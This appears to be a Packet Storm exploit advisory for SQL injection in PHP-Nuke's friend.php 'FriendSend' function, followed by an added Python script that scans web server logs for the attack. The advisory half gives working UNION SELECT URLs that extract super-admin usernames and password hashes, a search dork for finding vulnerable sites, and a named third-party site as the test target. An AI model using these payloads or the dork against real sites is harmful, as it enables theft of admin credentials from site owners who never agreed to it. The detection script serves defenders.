PHP-Nuke Friend SQL Injection

2010-05-07T00:00:00
ID PACKETSTORM:89258
Type packetstorm
Reporter CMD
Modified 2010-05-07T00:00:00

Description

                                        
                                            `  
  
  
  
# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]  
# Date: [05.05.2010]  
# Author: [CMD]  
# Contact : cemede@ilkposta.com  
# Version: [all versions]  
  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
# Tested on: [http://www.astreet.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat%28aid,0x3a,pwd%29/**/from/**/authors/**/where/**/radminsuper=1/*]  
  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
# Code : [/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/*]  
  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
# Dork : inurl:friend.php?op=FriendSend  
  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*  
Example2: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
  
# Th@nks : AmeN, MUS4LLAT, Kayahan, Sinaritx, JacKaL, Qasım, Metrp0l, Despot...  
  
# Says : Hemso, look, one more bug xD ...   
  
  
`
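
For defenders reviewing web server logs: every request in this advisory carries a non-numeric `sid` on `friend.php?op=FriendSend`, with `/**/` standing in for whitespace. The following detection sketch is an added example, not part of the original advisory; it assumes combined-format access logs and that legitimate `sid` values are plain integers (as in `sid=392`), and the log lines and function names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# MySQL treats /**/ as whitespace; an unterminated /* comments out the rest.
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
SQL_TOKENS = re.compile(r"\b(union|select|group_concat|from|where|and|or)\b", re.I)

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/May/2010:10:00:01 +0000] "GET /friend.php?op=FriendSend&sid=392 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/May/2010:10:00:05 +0000] "GET /friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat%28aid,0x3a,pwd%29/**/from/**/authors/* HTTP/1.1" 200 4988',
    '198.51.100.7 - - [07/May/2010:10:00:09 +0000] "GET /modules.php?name=News HTTP/1.1" 200 9001',
]

def inspect(line):
    """Return a finding for a friend.php FriendSend request with a non-integer sid, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    if not url.path.lower().endswith("/friend.php") or "FriendSend" not in params.get("op", []):
        return None
    for sid in params.get("sid", []):
        if re.fullmatch(r"[0-9]+", sid):
            continue  # assumption: a legitimate story id is a bare integer
        # Replace SQL comments with spaces so the analyst sees the query fragment as MySQL would.
        normalised = SQL_COMMENT.sub(" ", sid).strip()
        tokens = sorted({t.lower() for t in SQL_TOKENS.findall(normalised)})
        return {"client": line.split(" ", 1)[0], "sid": sid,
                "normalised": normalised, "sql_tokens": tokens}
    return None

def scan(lines):
    """Return findings for every suspicious line in an iterable of log lines."""
    return [finding for finding in map(inspect, lines) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The non-integer `sid` check is the primary signal; the token list is triage context only and should not be used as the sole filter.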